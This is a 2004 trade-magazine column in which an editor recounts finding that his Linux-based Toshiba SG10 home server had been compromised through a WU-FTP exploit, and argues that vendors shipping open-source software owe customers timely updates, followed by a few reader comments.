Visibility=vulnerability
By Brian Dipert, Technical Editor -- EDN, March 18, 2004
I've just wrapped up a pretty nerve-racking 24 hours of computer inspection, education, and cleanup. As a result, I've revised my position on open-source software, in an admittedly pessimistic direction. My experience reveals some critical lessons for those of you planning-to include open-source products in your future system designs.
For almost a year and a half now, I've been running a Toshiba Magnia SG10 server appliance on my LAN. Mostly, I use it as a Samba-based print server and NAS (network-attached-storage) device, a repository for WMA (Windows Media Audio)-ripped audio-CD files and digital-camera images and a means of backing up e-mail, finance-software databases, and other important files. The SG10 is capable of much more, though. It's a full-blown displayless PC running Redhat Linux 6.1 and containing various open-source server packages, including WU-FTP, Sendmail and other e-mail software, the Apache Web server, DHCP and DNS, Squid for proxies, and telnet.
Yahoo Groups hosts active user-discussion communities, of which I'm a member, for the SG10 and follow-on SG20. The other day, a Linux-savvy owner reported that he'd figured out how to make the SG10 regularly poll a user-definable date and time server and, if necessary, adjust the SG10's hardware and system clocks. His utility makes use of Linux's cron daemon, which automatically runs commands and multicommand scripts at user-defined intervals. I'm a command-line Linux neophyte, but via the powerful, GUI-based Webmin utility, I've developed some limited skill in navigating my way around Linux. (I installed the utility; the SG10's factory-configured software did not include it.) I'd never checked out my SG10's cron settings, so I fired up Webmin and had a look.
What I discovered initially—and increasingly, as I explored more of my system—left me feeling both panic-stricken and extremely vulnerable. Several times, I've briefly opened up a hole in my firewall so that companies with which I work on my various hands-on projects could transfer files to and from the SG10's FTP server. Back in late 2002, a cracker "sniffed" my open FTP port and, via an exploit of WU-FTP, set up hidden user and group accounts (invisible to the Web-browser-based configuration utility that Toshiba ships with the SG10). The cracker also installed "sniffer" software on my SG10 and has since then been receiving a daily e-mail from the SG10 (thereby bypassing my firewall's protection) with cleartext login and password information.
After I calmed down, I could more accurately assess the extent of the damage. It appears that the only information being sent was a cumulative log of WU-FTP access attempts. Because I infrequently used the SG10's FTP server and only briefly exposed it to the Internet through port 21, the cracker could rarely make use of the information he or she obtained. I've disabled the cron script sending the e-mail, deleted the cracker's user and group accounts, and shut down the auto-load of Sendmail on system boot that was, by default, configured on the SG10. I think I've regained control of the situation. The impact of the cracker's exploit could have been (and may still be, unbeknown to me) far worse. Had I relied on only the Toshiba configuration menus, I never would have known I had a mess on my hands.
Toshiba provides a Windows Update-like feature on the SG10 that regularly polls for operating-system and application updates. This feature could have patched the WU-FTP exploit, had a fix been available in time. Unfortunately for me and other SG10 owners, the system is no longer in production, and maintenance of the software image is therefore no longer occurring. Theoretically, I could regularly monitor relevant software Web sites to identify and install updates for the SG10's Internet-exposed programs, but such a scenario is improbable even for an atypical geek like me. I can't imagine most owners of Linux-powered equipment taking this approach, even if they knew what operating system their widget ran. And, if you burn the OS and applications to ROM, updates are impossible.
Open-source software has some compelling selling points. For one thing, it's free, and the many thousands of developer eyeballs peering over it generally result in robust code. When a vulnerability is discovered, those same developers quickly fix it. But among those thousands of eyeballs are sets with more nefarious objectives in mind, and access to source code enables them to develop exploits for unpatched, easily identified software builds. Certainly, you should consider open-source products. But realize, when you do, the obligation you have to your customers to quickly and easily provide updates. Realize, too, the legal quagmire you may stumble into if you don't.
Contact me at bdipert@edn.com.
-
An interesting essay. However, a great deal of work seems to have been done over the last four years or so making Linux - especially Fedora - much less vulnerable. Fedora 12 is about to be released, and Fedora 6.1 has not been actively maintained, to my understanding, for quite a long time. It's pretty good practice to keep your OS up to date.
Burnie West - 2009-15-11 11:50:00 PST -
Well put Brian. I see your point, especially in hardcoded software and user-mediated updates. It seems the integrity of opensource will play out in a battle of competing factors. Those factors being: hacker insights, power-user insights, and everyday users' access to and implementation of those insights. I look forward to seeing it play out. Hopefully future R&D efforts will augment the favorable factors and and diminish the negative.
Marc Gelnett - 2004-26-3 08:45:00 PST -
Clearly in today's ever changing software world any critical software -
commercial or opensource - should be kept reasonably up to date and
patched. All quality software providers - commerical and opensource - offer
updates and patches. You have now joined the large club of those who have
learned this the hard way. (Ahem - something like might have happened to
me on the commercial side ... but I'm still planning on using commercial
software.)
Bruce Hohl - 2004-20-3 12:00:00 PST
